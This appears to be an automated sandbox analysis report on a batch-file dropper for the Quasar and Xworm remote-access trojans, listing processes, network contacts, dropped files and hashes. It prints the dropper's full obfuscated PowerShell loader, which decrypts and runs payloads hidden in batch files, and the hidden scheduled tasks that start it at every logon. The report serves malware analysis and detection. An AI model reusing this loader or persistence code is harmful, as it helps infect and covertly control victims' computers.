Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Xworm

trojan rat xworm

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3998431567-3716957556-781226098-1000_Classes\Local Settings C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4040 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4040 wrote to memory of 1932 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 3832 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 3832 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1932 wrote to memory of 4984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 1932 wrote to memory of 4984 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4984 wrote to memory of 3264 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4984 wrote to memory of 3264 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3264 wrote to memory of 4516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3264 wrote to memory of 4516 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4516 wrote to memory of 4872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4516 wrote to memory of 4872 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 4872 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4872 wrote to memory of 600 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 1376 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 600 wrote to memory of 4696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 600 wrote to memory of 4696 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WScript.exe
PID 4696 wrote to memory of 1748 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 4696 wrote to memory of 1748 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 1748 wrote to memory of 3956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1748 wrote to memory of 3956 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ModXPack.bat"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModXPack.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModXPack.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_814_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_814.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_814.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_814.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ar40zlieFNlZaUj3AL2N1EtUIYttX5FHsAuya/nsc+w='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wCB8CDrdK9+j4h/nyuJCng=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GLLph=New-Object System.IO.MemoryStream(,$param_var); $MsIqn=New-Object System.IO.MemoryStream; $KBydi=New-Object System.IO.Compression.GZipStream($GLLph, [IO.Compression.CompressionMode]::Decompress); $KBydi.CopyTo($MsIqn); $KBydi.Dispose(); $GLLph.Dispose(); $MsIqn.Dispose(); $MsIqn.ToArray();}function execute_function($param_var,$param2_var){ $fIktN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $kxYyl=$fIktN.EntryPoint; $kxYyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_814.bat';$ceETs=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_814.bat').Split([Environment]::NewLine);foreach ($aPfSn in $ceETs) { if ($aPfSn.StartsWith(':: ')) { $MnTnq=$aPfSn.Substring(3); break; }}$payloads_var=[string[]]$MnTnq.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ModPack.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\ModPack.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\ModPack.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_358_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_358.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_358.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_358.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('oIuq0D2JsIte4qdBn3PfveZB2hemnp4WZ5JiXUU64uU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('j5Nc6y/4HYz/a6tGOVhj2g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $bbueY=New-Object System.IO.MemoryStream(,$param_var); $WfWxg=New-Object System.IO.MemoryStream; $WZoDo=New-Object System.IO.Compression.GZipStream($bbueY, [IO.Compression.CompressionMode]::Decompress); $WZoDo.CopyTo($WfWxg); $WZoDo.Dispose(); $bbueY.Dispose(); $WfWxg.Dispose(); $WfWxg.ToArray();}function execute_function($param_var,$param2_var){ $VzXdJ=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $oRDXB=$VzXdJ.EntryPoint; $oRDXB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_358.bat';$ieMUF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_358.bat').Split([Environment]::NewLine);foreach ($sRhnT in $ieMUF) { if ($sRhnT.StartsWith(':: ')) { $ePxsJ=$sRhnT.Substring(3); break; }}$payloads_var=[string[]]$ePxsJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));

Network

Country Destination Domain Proto
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.7.6.8.0.7.2.8.3.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 220.167.154.149.in-addr.arpa udp
US 8.8.8.8:53 china-earth.gl.at.ply.gg udp
US 147.185.221.19:14568 china-earth.gl.at.ply.gg tcp
US 8.8.8.8:53 19.221.185.147.in-addr.arpa udp
US 8.8.8.8:53 notes-creation.gl.at.ply.gg udp
US 147.185.221.19:27030 notes-creation.gl.at.ply.gg tcp
US 8.8.8.8:53 ipwho.is udp
DE 195.201.57.90:443 ipwho.is tcp
US 8.8.8.8:53 90.57.201.195.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp

Files

memory/1932-4-0x0000017AD83F0000-0x0000017AD8412000-memory.dmp

memory/1932-7-0x0000017AD85A0000-0x0000017AD8616000-memory.dmp

memory/1932-8-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/1932-9-0x0000017AD82B0000-0x0000017AD82C0000-memory.dmp

memory/1932-10-0x0000017AD82B0000-0x0000017AD82C0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2wtqtarg.lyt.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/1932-21-0x0000017AD82B0000-0x0000017AD82C0000-memory.dmp

memory/1932-26-0x0000017AD8550000-0x0000017AD8558000-memory.dmp

memory/1932-27-0x0000017AD8860000-0x0000017AD8A02000-memory.dmp

memory/3832-36-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/3832-38-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp

memory/3832-39-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp

memory/3832-54-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp

memory/3832-69-0x0000029CAAFF0000-0x0000029CAB000000-memory.dmp

memory/3832-73-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 ad5cd538ca58cb28ede39c108acb5785
SHA1 1ae910026f3dbe90ed025e9e96ead2b5399be877
SHA256 c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033
SHA512 c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 f45bad28bfc59e679ff291d807779e54
SHA1 4743408f9529733b71f8859a6a396eb87eabed23
SHA256 51df79556153f93c6640a441ac4d416d916056b7bdaec11a35d43dc2b4ca2aac
SHA512 960072afd129f4faef1f38771ad1eb737e582c1eacef6537d9323c75948f55fbddca0c0f73b47e30495fe047ddfbf6aab17acf9d2546316bec141244a21982a6

C:\Users\Admin\AppData\Roaming\startup_str_814.vbs

MD5 723f0cfcb01b09604416e4b4ecd29a80
SHA1 dea4fc842041133cef8c0d1760bffd30bac7fb7e
SHA256 8c785d4441b59920cb35b2307eab9132d65c6f2320dcac5d7879ef64cfc2086b
SHA512 e4ef5c4486b67e9d66d9c143cf91221a71e1c037859e7580b80b19ec3e4bb0051bca577b0d2dbad609fa5b34b650fab00ecb5e20b0f6171c638fec697d1f2806

C:\Users\Admin\AppData\Roaming\startup_str_814.bat

MD5 51d7b8be303abf43851e767d9250887b
SHA1 e795e381647c8a99529f87810347881b6b9bdeba
SHA256 e9934713ab2bde592f73c677d6ad05656b81638a65626f2fd70aefa11f14378d
SHA512 1ee6999e72bafb69559c1dbeb6ff84e46f94fe1b51a82626d7feabce5619053299872d680520aac791e103a3fb45a6d002180cc166215c59517e6c72dae6ee26

memory/4516-90-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/4516-91-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp

memory/4516-93-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp

memory/1932-94-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/4516-109-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp

memory/4516-115-0x0000028EBFD00000-0x0000028EBFD0E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ModPack.bat

MD5 105f33324f5807a250699b78a8972954
SHA1 c7e43ef81256e582a290a84a387a2163e35de9fb
SHA256 636bf2c51b857661bf1125085ee11bc28cf2d8f2cdaa5d44135dd8d87a52a4b5
SHA512 162dabf9630be54a2c6775d9f928be6923462b211d9072752341bcdaeae8099b0d49b6710bedd13f894cc72742336728365b44e8f282622487d11fcc9cdc7101

memory/600-129-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/600-130-0x00000217CD140000-0x00000217CD150000-memory.dmp

memory/600-131-0x00000217CD140000-0x00000217CD150000-memory.dmp

memory/600-144-0x00000217CD140000-0x00000217CD150000-memory.dmp

memory/600-149-0x00000217CD420000-0x00000217CD428000-memory.dmp

memory/600-150-0x00000217CD730000-0x00000217CD862000-memory.dmp

memory/1376-160-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/1376-161-0x000001D17CED0000-0x000001D17CEE0000-memory.dmp

memory/4516-162-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/1376-164-0x000001D17CED0000-0x000001D17CEE0000-memory.dmp

memory/1376-178-0x000001D17CED0000-0x000001D17CEE0000-memory.dmp

memory/1376-195-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 9a23d42415a265d33ff202c8a5d27cb0
SHA1 8628830b4d68669de80bb16ea3ead90758f3fcd8
SHA256 18ca45333ca6560f367d8a00d2d8551f3920e63718c6b0bae5d034c5cca766ea
SHA512 1d772e0441603d03e0f4301db7962e80fa1bde93eb76c76e9f26726f34778af915ae22faea0c8cec532528af9157b696cfb26c3a68af45e3513fae6b678e3ac0

C:\Users\Admin\AppData\Roaming\startup_str_358.vbs

MD5 e38f413342ebf7d2fc4b12d2acd8b0ac
SHA1 02cd62b28941e57f85ee1900506581cf72b97a5a
SHA256 04f9b8eed35f17a3c4fc423fb81a9a45b035b7121f9c3ff883ef8d05241722f3
SHA512 9e57944317a9bbf81fbe40993d6c65f85c76b07dbb909db5800ce3895445525924783b7635b4218597adafc3d6e96174de5cc925fceaf95a0c88da2c0091360c

memory/600-208-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/3956-213-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/4516-214-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp

memory/3956-215-0x0000021B72720000-0x0000021B72730000-memory.dmp

memory/3956-216-0x0000021B72720000-0x0000021B72730000-memory.dmp

memory/4516-217-0x0000028EBFBA0000-0x0000028EBFBB0000-memory.dmp

memory/3956-232-0x0000021B72720000-0x0000021B72730000-memory.dmp

memory/3956-236-0x0000021B72E50000-0x0000021B73174000-memory.dmp

memory/3956-238-0x0000021B736E0000-0x0000021B73730000-memory.dmp

memory/3956-239-0x0000021B73AE0000-0x0000021B73B92000-memory.dmp

memory/3956-240-0x0000021B73D70000-0x0000021B73F32000-memory.dmp

memory/3956-244-0x0000021B73860000-0x0000021B73872000-memory.dmp

memory/3956-245-0x0000021B73BE0000-0x0000021B73C1E000-memory.dmp

memory/3956-252-0x00007FFDF5C90000-0x00007FFDF667C000-memory.dmp

memory/3956-253-0x0000021B72720000-0x0000021B72730000-memory.dmp